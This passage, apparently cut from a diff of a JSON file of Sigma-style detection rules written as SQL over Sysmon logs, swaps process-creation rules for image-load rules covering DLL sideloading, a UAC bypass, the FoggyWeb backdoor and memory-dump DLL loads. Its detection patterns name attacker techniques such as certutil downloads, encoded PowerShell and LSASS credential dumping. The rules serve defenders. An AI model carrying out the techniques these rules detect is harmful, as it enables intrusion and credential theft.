LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" }, { - "title": "CMD Shell Output Redirect", - "id": "4f4eaa9f-5ad4-410c-a4be-bc6132b0175a", + "title": "Potential Libvlc.DLL Sideloading", + "id": "bf9808c4-d24f-44a2-8398-b65227d406b6", "status": "experimental", - "description": "Detects the use of the redirection character \">\" to redicrect information in commandline", - "author": "frack113", + "description": "Detects potential DLL sideloading of \"libvlc.dll\", a DLL that is legitimately used by \"VLC.exe\"", + "author": "X__Junior", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment" + "False positives are expected if VLC is installed in non-default locations" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR CommandLine LIKE '%chrome-extension://%' ESCAPE '\\' OR CommandLine LIKE '%\\\\.\\\\pipe\\\\chrome.nativeMessaging%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\libvlc.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\VideoLAN\\\\VLC\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\VideoLAN\\\\VLC\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_cmd_redirect.yml" + "filename": "image_load_side_load_libvlc.yml" }, { - "title": "Script Event Consumer Spawning Process", - "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", - "status": "experimental", - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "author": "Sittikorn S", + "title": "PCRE.NET Package Image Load", + "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "status": "test", + "description": "Detects processes loading modules related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.execution", - "attack.t1047" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_scrcons_susp_child_process.yml" + "filename": "image_load_pcre_net_load.yml" }, { - "title": "Suspicious PowerShell Child Processes", - "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "status": "experimental", - "description": "Detects suspicious child processes spawned by PowerShell", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "DotNET Assembly DLL Loaded Via Office Application", + "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", + "status": "test", + "description": "Detects any assembly DLL being loaded by an Office Product", + "author": "Antonlovesdnb", + "tags": [ + "attack.execution", + "attack.t1204.002" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_child_processes.yml" + "filename": "image_load_office_dotnet_assembly_dll_load.yml" }, { - "title": "Indirect Command Execution By Program Compatibility Wizard", - "id": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", + "title": "Wmiprvse Wbemcomn DLL Hijack", + "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", "status": "test", - "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", - "author": "A. Sungurov , oscd.community", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", - "Legit usage of scripts" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pcwrun.yml" + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Suspicious Obfuscated PowerShell Code", - "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", - "status": "experimental", - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "author": "Florian Roth (Nextron Systems)", + "title": "Active Directory Parsing DLL Loaded Via Office Application", + "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", + "status": "test", + "description": "Detects DSParse DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_encoded_obfusc.yml" + "filename": "image_load_office_dsparse_dll_load.yml" }, { - "title": "Suspicious Download Via Certutil.EXE", - "id": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", - "status": "test", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential DLL Sideloading Via ClassicExplorer32.dll", + "id": "caa02837-f659-466f-bca6-48bde2826ab4", + "status": "experimental", + "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\ClassicExplorer32.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Classic Shell\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_download.yml" + "filename": "image_load_side_load_classicexplorer32.yml" }, { - "title": "Control Panel Items", - "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "title": "FoggyWeb Backdoor DLL Loading", + "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", "status": "test", - "description": "Detects the malicious use of a control panel item", - "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.resource_development", + "attack.t1587" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\')" + ], + "filename": "image_load_malware_foggyweb_nobelium.yml" + }, + { + "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", + "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", + "status": "experimental", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '\tC:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_control_panel_item.yml" + "filename": "image_load_dll_vssapi_susp_load.yml" }, { - "title": "Potential Download/Upload Activity Using Type Command", - "id": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", + "title": "Potential Antivirus Software DLL Sideloading", + "id": "552b6b65-df37-4d3e-a258-f2fc4771ae54", "status": "experimental", - "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", + "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", + "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > \\\\\\\\\\*' ESCAPE '\\') OR (CommandLine LIKE '%type \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((((ImageLoaded LIKE '%\\\\log.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\TelemetryUtility.exe' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\plugin\\\\log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\log.dll' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Canon\\\\MyPrinter\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\qrt.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\')))) OR ((ImageLoaded LIKE '%\\\\ashldres.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockdown.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsodscpl.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\McAfee\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\McAfee\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\vftrace.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\wsc.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\tmdbglog.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\DLPPREM32.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\ESET%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\ESET%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_lolbin_type.yml" + "filename": "image_load_side_load_antivirus.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher", - "id": "b222df08-0e07-11eb-adc1-0242ac120002", + "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", + "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "status": "test", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" + "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" }, { - "title": "New Service Creation Using Sc.EXE", - "id": "85ff530b-261d-48c6-a441-facaa2e81e48", - "status": "test", - "description": "Detects the creation of a new service using the \"sc.exe\" utility.", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "title": "DLL Sideloading Of DBGCORE.DLL", + "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ + "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate administrator or user creates a service for legitimate reasons.", - "Software installation" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sc_create_service.yml" + "filename": "image_load_side_load_dbgcore_dll.yml" }, { - "title": "Windows Update Client LOLBIN", - "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "title": "Potential DLL Sideloading Via comctl32.dll", + "id": "6360757a-d460-456c-8b13-74cf0e60cceb", "status": "experimental", - "description": "Detects code execution via the Windows Update client (wuauclt)", - "author": "FPT.EagleEye Team", + "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_wuauclt_execution.yml" + "filename": "image_load_side_load_comctl32.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", - "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", - "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "UAC Bypass Using Iscsicpl - ImageLoad", + "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "status": "experimental", + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' 